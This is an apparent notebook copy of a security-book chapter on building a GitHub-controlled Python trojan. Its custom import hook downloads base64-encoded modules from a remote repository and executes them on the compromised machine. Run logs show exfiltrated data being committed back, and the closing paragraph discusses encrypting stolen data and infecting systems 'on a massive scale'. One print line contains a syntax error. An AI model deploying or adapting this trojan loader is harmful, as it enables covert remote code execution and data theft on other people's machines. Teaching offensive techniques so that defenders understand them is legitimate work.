<a href="https://colab.research.google.com/github/damianiRiccardo90/BHP/blob/master/C7-Github_Command_And_Control/Hacking_Python_Import_Functionality.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

### *__Hacking Python's import Functionality__*

If you've made it this far in the book, you know that we use Python's __import__ functionality to copy external libraries into our programs so we can use their code. We want to be able to do the same thing for our trojan. But since we're controlling a remote machine, we may want to use a package not available on that machine, and there's no easy way to install packages remotely. Beyond that, we also want to make sure that if we pull in a dependency, such as __Scapy__, our trojan makes that module available to all other modules that we pull in.

Python allows us to customize how it imports modules; if it can't find a module locally, it will call an import class we define, which will allow us to remotely retrieve the library from our repo. We'll have to add our custom class to the __sys.meta_path__ list. Let's create this class now by adding the following code:

In [ ]:
class GitImporter:
    def __init__(self):
        self.current_module_code = ''

    def find_module(self, name, path=None):
        print('[*] Attempting to retrieve %s' %s name)
        self.repo = github_connect()
        new_library = get_file_contents('modules', f'{name}.py', self.repo)
        if new_library is not None:
            self.current_module_code = base64.b64decode(new_library) #[1]
            return self

    def load_module(self, name):
        spec = importlib.util.spec_from_loader(name, loader=None,
                                               origin=self.repo.git_url)
        new_module = importlib.util.module_from_spec(spec) #[2]
        exec(self.current_module_code, new_module.__dict__)
        sys.modules[spec.name] = new_module #[3]
        return new_module

Every time the interpreter attempts to load a module that isn't available, it will use this __GitImporter__ class. First, the __find_module__ method attempts to locate the module. We pass this call to our remote file loader. If we can locate the file in our repo, we base64-decode the code and store it in our class __[1]__. (Github will give us base64-encoded data.) By returning __self__, we indicate to the Python interpreter that we found the module and that it can call the __load_module__ method to actually load it. We use the native __importlib__ module to first create a new blank module object __[2]__ and then shovel the code we retrieved from Github into it. The last step is to insert the newly created module into the __sys.modules__ list __[3]__ so that it's picked up by any future __import__ calls.

Now let's put the finishing touches on the trojan:

In [ ]:
if __name__ == '__main__':
    sys.meta_path.append(GitImporter())
    trojan = Trojan('abc')
    trojan.run()

In the __\_\_main\_\___ block, we put __GitImporter__ into the __sys.meta_path__ list, create the __Trojan__ object, and call its __run__ method.

Now let's take it for a spin!

### *__Kicking the Tires__*

All right! Let's test this thing out by running it from the command line.

__[WARNING]__


_If you have sensitive information in files or environment variables, remember that without a private repository, that information is going to go up to Github for the whole world to see. Don't say we didn't warn you. Of course, you could protect yourself using the encryption techniques you'll learn Chapter 9._

```
$ python git_trojan.py
[*] Attempting to retrieve dirlister
[*] Attempting to retrieve environment
[*] In dirlister module
[*] In environment module.
```

Perfect. It connected to the repository, retrieved the configuration file, pulled in the two modules we set in the configuration file, and ran them.

Now from your trojan directory, enter the following on the command line:

```
$ git pull origin master
From https://github.com/tiarno/bhptroian
    6256823..8024199  master    -> origin/master
Updating 6256823..8024199
Fast-forward
  data/abc/2020-03-29T11:29:19.475325.data | 1 +
  data/abc/2020-03-29T11:29:24.479408.data | 1 +
  data/abc/2020-03-29T11:40:27.694291.data | 1 +
  data/abc/2020-03-29T11:40:33.696249.data | 1 +
  4 files changed, 4 insertions(+)
  create mode 100644 data/abc/2020-03-29T11:29:19.475325.data
  create mode 100644 data/abc/2020-03-29T11:29:24.479408.data
  create mode 100644 data/abc/2020-03-29T11:40:27.694291.data
  create mode 100644 data/abc/2020-03-29T11:40:33.696249.data
```

Awesome! The trojan checked in the results of the two running modules.

You could make a number of improvements and enhancements to this core command-and-control technique. Encrypting all your modules, configuration, and exfiltrated data would be a good start. You'd also need to automate the process of pulling down data, updating configuration files, and rolling out new trojans if you were going to infect systems on a massive scale. As you add more and more functionality, you'll also need to extend how Python loads dynamic and compiled libraries.

For now, let's work on creating some standalone trojan tasks, and we'll leave it to you to integrate them into your new Github trojan.